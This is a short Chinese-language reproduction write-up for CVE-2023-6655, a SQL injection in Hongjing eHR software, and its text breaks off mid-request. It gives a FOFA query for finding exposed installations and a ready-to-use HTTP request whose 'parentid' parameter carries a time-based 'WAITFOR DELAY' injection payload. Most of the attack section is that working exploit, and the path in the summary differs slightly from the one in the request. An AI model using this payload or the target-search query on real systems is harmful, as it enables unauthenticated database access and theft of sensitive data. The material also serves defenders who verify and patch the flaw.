宏景eHR SQL 注入漏洞复现(CVE-2023-6655)

0x01 产品简介

 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合，满足动态化、协同化、流程化、战略化需求的软件。

0x02 漏洞概述

宏景eHR 中发现了一种被分类为关键的漏洞，该漏洞影响了Login Interface组件中/w_selfservice/oauthservlet/%2e../.%2e/general/inform/org/loadhistroyorgtree文件的某个未知功能。通过操纵参数parentid可能导致SQL注入攻击，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。

0x03 复现环境

FOFA：app="HJSOFT-HCM"

0x04 漏洞复现

PoC

GET /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree?isroot=child&parentid=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&kind=2&catalog_id=1&issuperuser=111&manageprive=1&action=1&target= HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.